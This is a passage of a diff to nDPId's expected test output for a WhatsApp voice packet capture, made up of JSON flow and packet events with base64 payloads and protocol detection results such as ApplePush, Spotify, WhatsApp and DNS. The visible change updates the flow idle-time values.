/DALOFfsZZCyD97Lwmcig1rgISji1T9qsBO4dRFWt5bVa2GoIozmHRLhPE\/xUBXrVvCjMLlRXbBby9l3tFLBkeNarajglfyHMtazotsPWceBe13wiPjaSciJqd486cT5nmripbb2TNv6m2QS+yBxolanBtMMlalvyClJnjFYXmEMA\/Cqafcjah0LpamWi5cGxlhK2o7VpcXk60WiDqklprDwU1C6AQQ3t9+In381BWOH2ylFLvtkYQS6mza73M7ORMV9T+VX4ja00u4BItehp2lgwr5wZ9hQu6lejNiwFYLaMPe7D\/bAwWtcZeYT8kAUL9H2S1idX7efThRI\/sFUnhFydcfZzFx9yoqvQ\/XNBIf8hR2ZwEmxUM7nHYq2mZ+\/B91bETK14kZx6AmSi1jqJABWenJppvp4cXzcY1BWUqJk0PLYkAexhw7t652If5IzcojeSdWFP2lhdau7nHX6G7lW4Utg7ZWXLyccWSWSv6ha+LeiDlED1cCwY2vVHkPEKRqluaQYKLl2qvR1wE3m0usuIl4q2MEc3z7A5MGmXicgQHspwoVe96OedZ9UbKdxn5F5OBTgOA+JY4EBKs3\/51SigijtnbNr7w00IZM1a32DUVsHDNnCKoJQHhPhULTSuboR4FgTKv5jA8DkAaFXzOTQQMYjx7YZD+FVCVnmqRcXzRQCUejaACj05EFq7vsiXpx9kEWnOGLDfJ22A0AjBRXoBK9EYB2xjWa+gzWXLgtnfTfAdhzT3lkAyklF\/qQA0sttDRgDxUQ4slW4E3BzVFH0h4GehIXJZzWEseP9XQr0J1UhTOB7Dv78mCeQyIVzY5PpIKGqL37IUaJV6gk4viji4bM8JRt522Xsc3xIrKuiMjhRRmYQYZR2\/fsuI+jWL\/oLRyVbeQmMYbj2qIY8qMyxD0\/HUbbJCm1sWV3U2RsK1wnhcO2gFFVKyPqfKwE0xDwAtsxVH6ZCeakAFNP5dRNlfhay6WJ8owHDTw=="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688201,"flow_last_seen":1561455688201,"flow_idle_time":7560000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1561455688201,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"17.242.60.84","src_port":49354,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02420{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1561455688201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1561455688201,"pkt":"xiwDYGpkkLkxKPrKCABFAgXUAABAAEAGJCjAqAIMEfI8VMDKFGdIDyQZ7pIeMIAQCAC0bwAAAQEICjTN8KY8skLCFwMDD+Ai5NOSopi\/6GqwlD\/tAZzY1QGzvljqTGTmGCJOrU3x8CYKomrYaziO5eZ4ouY8cCYpOJvKrDNJX33pdge2bBxjgZp3ciHlbT9gHcPpJV3HIK5K4Xwsy7N\/d9l3pDdGz5PHrVVzZeXakf14DKR+hXrIhRVy6hpv5t2VthQzM3sKU7KhJpL\/6a5Sp489WK3Z7dzYFK2J+ermhE1b03GDPIEb7MGTpTJQaqangZgy8gro1eaetAilk1o529zodA1M9O5BVqL2oF301LG+kaqQTY1SPLvOnn1MxBlBEbzmsfvPr0H7C5Xcv51kP+cMU9R39VU1KEVp3e+2GMmIXWxgb+NKRMo4d5o6BKoHJ36YKQ33eAmIMAcZsFkdzfDz5q2jCxngiuQsbQKoYL1rQHGV7CXWI3zE9edQrQPJaGQZaxu\/+b+1vqSWxtCMEOUMVSmhM+FpUOqnKqwXsN4BgvySE1+U34RH0SV6FPoBjF0WGfVjkUid\/lVZcbedi\/PfkG0yBpT2\/Is9EIUqT+5Azj96UOFZqIEtSsIYSrk7ySkvjrKz5bHkeMLQk1mxQwJByZOSa30oY5bmNGAgD00g7CKAigVgWl6pq33BURhk4PDRhLJn426pN8ndnOOPzVylhr5g1C978hT8qaiuW1hlXdPnoMeCp9hEy7A5ziIjQi\/j6SVmDBSjwtJ0oqoQ\/ul2VzP1hHUGnZiTl\/qoxKKUfFrrwqTto6BvQjrKNa8bmHfrJg1RkCF3YK1iU3RCTPB\/4c68wZU3wRZ8hH1dNOLSgkwNQHFvEa\/gv\/qOxZkCS+Hpja9b5OtYooCqZnURTItdIoosw\/pte6KHG8eCIx\/U7yLLCmLs4D6MQwGZZ2yJ9zt9zcZXv1g03W4UohfquGy0ioHzSnw\/O3jNSfyTyrsrgxGqBD7B02ehphvU7Ax3IIziLDpWGnOBTyjYVNl423Z+0c9qK5fdUeybRNKKbWmwJqAFyKo3Mn2oSjBse+IbmEyy74UtCrn7MO79P00k7ZwAdz4X9zs28aMTKpnGFfXXxKMpT0Dd5ofiYXaTFr2Jwybi92XLCleA2OWxMIUro0rxoo67fYKdVxbqwQCMyEw6LTznHMXWYOpkkn6VHuawZe8M1HJsON5lEoItuqd\/IBfWUMshGlV8OgIAoc3EW3VlOFAiqg0pqVqjmyE8T8wQAvejRCf2f7iThtrzSrjIJDgibkW3Ecp3KoIC1KVlhjp4HLMvTgc12F13bDzcsr4rYSNpgOus\/4N4UzMrQyfYM2uNlqx0HfPLs50MVn\/Kyef0KdSuCHGqHLEJ+g1+EB9i2mop53wwymGotu9IoWgU02wrdRtoavOIQ5TMaPT9Jy+tmpyw9rSZn4YhMfxR72sCFIVM2eQlDOP2kti8y02qh8vwstuWp8ER3\/PKo9BgChhkuUmF5Df6lKXn1exWi67C9f1S5pc1iv33gDt3T0VcEHwoxmIh6MLrQ4LDUY7JX7mEuRfro3sR\/Ir2ufPPOhOBqsPV5YskVY9tWAevz7WMRn8EtRyvVaVHL3wxu1gErJNgcQ\/Af9fGR5KHI8lfrzLWY+bV9Q6PY8piE9FU2r7QV9Q5YgbBE6yKjPA3fOpiBOv+IVCsLXJNVdRvAywibpuoJAy2z01Fc5o3x+ZW2eqdFSSyuDepi7EBv4YJnAtmqjCVimRnoZ68Pz\/ocEFw5tBKkvU5uadJKwflJJ0hJUUOKwAQFCWvvApj3f356wTvDmU788W1R\/Vmzin60ZrsL16uD4sDmXGOueQVWddIzbIT0jyuT6IK9gJjCyELuMZhwwjNJ\/gEh8+\/PwFaVXbn\/1dsvjpj0IhPwCusRttL60194v983ySgSQpQrf9f+n\/rJIRYwpsq4DBRu9SydD72zD93mD4idl3s3tsUHh6rp5k7Bf4L"} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688201,"flow_last_seen":1561455688201,"flow_idle_time":7560000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1561455688201,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"17.242.60.84","src_port":49354,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} +02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1561455688202,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1561455688202,"pkt":"xiwDYGpkkLkxKPrKCABFAgXUAABAAEAGJCjAqAIMEfI8VMDKFGdIDym57pIeMIAQCADYpQAAAQEICjTN8KY8skLCFtVfgrozcBhAJsfsFvLQO\/UNbKaPAKskPEHc2H7HNZvZ0KHfZ\/KP+B9OyPm0SdMSjavTXp1RBX4n8dtnNy7ldwySyG0XJJWeRoZiiRtgXrZdFFD0QAS3Pe1DBo\/FUctyy9XBKqwrw5v92Jj5UtBctOxUvfejQ1SPTAJ5IukXOUTVRhF+GJ6uJpn2Gyv2J\/hXj4mZyNeIliL2I7bOA3ury1GpGWko+MWMnPSKdWfc+5iZ8htj49VB2VDsL+uaCsidGqZX708pkKajJgAtzAX6+OwUhPXab61vOJn2ZVsE84On3Sc1Kl0WWtXgaA5Kty9ym4wLqQYEYP55F5oeJX4cTBOZRUcxhyM2DEPfiJE4aGH7aPKJO1JXXtoaeR6aRsid5OY044cRXoCwjbqa8kVLoyG\/1hSUaMwK17Rm6Nq+PbrF+ED8fmHgN\/1Dutcz+R4xma\/dfBoQDryBVCTEwOthrl7LLjRmNDBA\/nKPrgUx1pUPyir\/k\/cBNu5VmA9ROEDXJTcYsaqkjSroNougihkTVcfxMwA0V1eozYWnylZYZfyg3u53u+M+Do2uu\/vpHb6ZX\/5fq7AfMO72tRX4kcflTeOHJPV42uX70ZwC1O+A2X8wG0wRrb8uK6OFhHts3S52N3FVIqWr3CBOEKtXus3msBLphIaEqtw7dKWimDDeKkgZyeDybQGBbwSqGgwXI4sXoyN6QNVYT2T4i6kGXwJ8KRo8HtR5yB7rhqGJ7va7Tq2PlcpSnVIQRwao1mofCncrFLbOpoxslAuFLv8G+fW1GEiueEIhAplFAErT8lEbc6sY9uI88S0O6mDpNBlvCBLanRfw12SWljEVA4Wh2w31ojL9SCLJgyYKb3rrXT3V5i0AGJxXutmEyz9yTXUcoSU1YUo3WfmVLfx6RyxgbfoU7yfB7G33wI6gfsYIkzsYXlIla2ZkFjlWmYTCmfyEh6mVsXCVMnp1BhZdWj+7bWgfM4VrhMG0uNxDM0Z53kq9r7jYLXP1URavTKVNjY1WxQ1RAuRJtVPSgtQELf6AAzGAMW947SHl7bPC94gub8Kmqytrgl8ICRtP21Twca8YlwoKzIkJ0ROGsHSJ1IUBnknB2X57XNTUY80EyrwKOEYdXqBbK5\/uwztG9gvPjPu8PKqPu7OCXZj1ZBnnEX2PjjdGe8\/qo\/GKpAlJAuol7xe33zGz401h7+ux36y894Mbarjx1CDQxx9YqwY6Lr4EHSyCq\/xOaCM9Ig4AmEcFYjNP6niCHmI6fO24v\/GQB6WXdzSw2ClyCXHYbvr4Qqi+4qXoeh2xXDeKjcBBfLtEOni++s2q3gzhbAvkZLj\/NmeA2TXw0Z3iDbzj8\/Y4RPkg+eKwZkIo3UDfKsFnJdpryN60+cHgLr\/4b6yqkGde7QP698bVNcwUBDmhcPTGUF72BSrLQvrtwQZtWbAZrNkztpBLnQ0QkqUG4rCER6dvRqYMKv5dFfseMTa1Q1gUuqPbbz23yUKTRtop\/\/Lht4EEFlQYsfbz48ddhpIGiMg5mZbcRDG3SabEXgtzSNVHYYfQC6vW4pikjByoIlKAdhA6SR3Oh3PU52UQkf1H00x5\/\/1hV8lcpLckyN2LNUVFAYrwz5do38QxPssBrJ+3S6\/aEGPegc3B67mnX5V9KdAWJTKT9mA6BOcYDIvqCcaofS9sLdAjWNazl\/6YRqmsk\/JZn6nsHta+t4co6kKrh8ZoenAhtwbNaOVmExbItteeviDeqFUd2pkhp3kXIT8d6YMdXIloWHR8vT7oGOwNL5sNWFZXjAeqyXFLohZVoKLbw4szdHzrmDOl0IHwY6y6lYvTSYc6OyNhkaHXFSCKUjvAFZPuWmliraxAT7phw5quixNUJhdRcYng0LMN9J3KAyHFA8Ber5WNyIqMxWZ5wh4eVaY0B\/wQ"} +02080{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1561455688202,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1255,"pkt_l4_len":1221,"thread_ts_msec":1561455688202,"pkt":"xiwDYGpkkLkxKPrKCABFAgTZAABAAEAGJSPAqAIMEfI8VMDKFGdIDy9Z7pIeMIAYCACWYAAAAQEICjTN8KY8skLChD9+sl9zTIn+9oKwtdTi9Vdi\/cqtS9SsuLktLexhq+H6HSh0nUz\/pR7lGjfA8jUSbTLAiEYeFmvZtDgZTjhibXwhbTyW2ej1slX5wS0YUeKb381u+fexhn3xRkOOgFD2lHUCDNs6ZDxZ3MgjWXZ\/6y+5+G4Cr5MmO9LbbXgHM2tCoGf6bFpAilIbDNDjf72PZn2d6eJMciO25CCni3NwF1VQe25Bd9JCM8RNSipKwwpntSqY6SidwnIyNKgMjNfj+GMhuOpcSsAcRSjT\/L\/y6Nc7rkRDfvgoZpO7IrcZRsLerm0SSzH8usyI2xA+WCvEPlDoV\/87+olgpceCoKG1cf6TrD9aD7Lh7Yzi2mRYXX50kN9XYC9UhK+eEqcUiK0EA6ia38NkceSip2pBuv85\/091UH5OzSLrTUOJg+XVoE7ssGb7XKiRE+FOZu+zmhmuXn2Ujg8u76JsqT+uY0KkCyvwkXLeCV2kPGxz31MiSwGtNtz1oNvEGHur+FQDs\/zPpy1TfX803cqFKkblAu9BFTe4MXIK6IqhxFJcK3dj\/d8o2Zlvxu2S2NA3FH3zT7CWqacXhL+wQyS+\/DALOFfsZZCyD97Lwmcig1rgISji1T9qsBO4dRFWt5bVa2GoIozmHRLhPE\/xUBXrVvCjMLlRXbBby9l3tFLBkeNarajglfyHMtazotsPWceBe13wiPjaSciJqd486cT5nmripbb2TNv6m2QS+yBxolanBtMMlalvyClJnjFYXmEMA\/Cqafcjah0LpamWi5cGxlhK2o7VpcXk60WiDqklprDwU1C6AQQ3t9+In381BWOH2ylFLvtkYQS6mza73M7ORMV9T+VX4ja00u4BItehp2lgwr5wZ9hQu6lejNiwFYLaMPe7D\/bAwWtcZeYT8kAUL9H2S1idX7efThRI\/sFUnhFydcfZzFx9yoqvQ\/XNBIf8hR2ZwEmxUM7nHYq2mZ+\/B91bETK14kZx6AmSi1jqJABWenJppvp4cXzcY1BWUqJk0PLYkAexhw7t652If5IzcojeSdWFP2lhdau7nHX6G7lW4Utg7ZWXLyccWSWSv6ha+LeiDlED1cCwY2vVHkPEKRqluaQYKLl2qvR1wE3m0usuIl4q2MEc3z7A5MGmXicgQHspwoVe96OedZ9UbKdxn5F5OBTgOA+JY4EBKs3\/51SigijtnbNr7w00IZM1a32DUVsHDNnCKoJQHhPhULTSuboR4FgTKv5jA8DkAaFXzOTQQMYjx7YZD+FVCVnmqRcXzRQCUejaACj05EFq7vsiXpx9kEWnOGLDfJ22A0AjBRXoBK9EYB2xjWa+gzWXLgtnfTfAdhzT3lkAyklF\/qQA0sttDRgDxUQ4slW4E3BzVFH0h4GehIXJZzWEseP9XQr0J1UhTOB7Dv78mCeQyIVzY5PpIKGqL37IUaJV6gk4viji4bM8JRt522Xsc3xIrKuiMjhRRmYQYZR2\/fsuI+jWL\/oLRyVbeQmMYbj2qIY8qMyxD0\/HUbbJCm1sWV3U2RsK1wnhcO2gFFVKyPqfKwE0xDwAtsxVH6ZCeakAFNP5dRNlfhay6WJ8owHDTw=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688445,"flow_last_seen":1561455688445,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455688445,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1561455688445,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455688445,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABI7iMAAEARBjHAqAIBwKgC\/+EV4RUANEtUU3BvdFVkcDC64ScQKi2g\/wABAARIlcIDyUSzc\/3fJAksKuG26pMF0apN5Ek="} 00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688445,"flow_last_seen":1561455688445,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455688445,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688704,"flow_last_seen":1561455688704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1561455688704,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1561455688704,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1561455688704,"pkt":"xiwDYGpkkLkxKPrKCABFAABAAABAAEAGxd7AqAIMnfAUNcDLFGab0QrZAAAAALDC\/\/8eGAAAAgQFtAEDAwYBAQgKNM3yoAAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1561455688744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1561455688744,"pkt":"kLkxKPrKxiwDYGpkCABFAAA8AAAAAFMG8uKd8BQ1wKgCDBRmwMsu6BkVm9EK2qASbHAbGAAAAgQFeAQCCAoefUIDNM3yoAEDAwg="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1561455688841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455688841,"pkt":"xiwDYGpkkLkxKPrKCABFAAA0AABAAEAGxerAqAIMnfAUNcDLFGab0QraLugZFoAQCAytcgAAAQEICjTN8zsefUID"} -00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":43,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1561455688704,"flow_last_seen":1561455689390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7769,"flow_avg_l4_payload_len":242,"midstream":0,"thread_ts_msec":1561455689390,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1561455688704,"flow_last_seen":1561455689390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7769,"flow_avg_l4_payload_len":242,"midstream":0,"thread_ts_msec":1561455689390,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688704,"flow_last_seen":1561455688704,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1561455688704,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1561455688704,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1561455688704,"pkt":"xiwDYGpkkLkxKPrKCABFAABAAABAAEAGxd7AqAIMnfAUNcDLFGab0QrZAAAAALDC\/\/8eGAAAAgQFtAEDAwYBAQgKNM3yoAAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1561455688744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1561455688744,"pkt":"kLkxKPrKxiwDYGpkCABFAAA8AAAAAFMG8uKd8BQ1wKgCDBRmwMsu6BkVm9EK2qASbHAbGAAAAgQFeAQCCAoefUIDNM3yoAEDAwg="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1561455688841,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455688841,"pkt":"xiwDYGpkkLkxKPrKCABFAAA0AABAAEAGxerAqAIMnfAUNcDLFGab0QraLugZFoAQCAytcgAAAQEICjTN8zsefUID"} +00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":43,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1561455688704,"flow_last_seen":1561455689390,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7769,"flow_avg_l4_payload_len":242,"midstream":0,"thread_ts_msec":1561455689390,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1561455688704,"flow_last_seen":1561455689390,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7769,"flow_avg_l4_payload_len":242,"midstream":0,"thread_ts_msec":1561455689390,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455689728,"flow_last_seen":1561455689728,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1561455689728,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":55296,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1561455689728,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1561455689728,"pkt":"xiwDYGpkkLkxKPrKCABFAABL058AAP8RYqTAqAIMwKgCAdgAADUAN5FDM2kBAAABAAAAAAAADG1lZGlhLW14cDEtMQNjZG4Id2hhdHNhcHADbmV0AAABAAE="} 00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455689728,"flow_last_seen":1561455689728,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1561455689728,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":55296,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"dns": {"query":"media-mxp1-1.cdn.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1561455689761,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1561455689761,"pkt":"kLkxKPrKxiwDYGpkCABFAABbphoAAEARTxrAqAIBwKgCDAA12AAAR3hsM2mBgAABAAEAAAAADG1lZGlhLW14cDEtMQNjZG4Id2hhdHNhcHADbmV0AAABAAHADAABAAEAAABFAAQfDVYz"} 00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":61,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455689728,"flow_last_seen":1561455689761,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1561455689761,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":55296,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"dns": {"query":"media-mxp1-1.cdn.whatsapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.86.51"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455689909,"flow_last_seen":1561455689909,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1561455689909,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 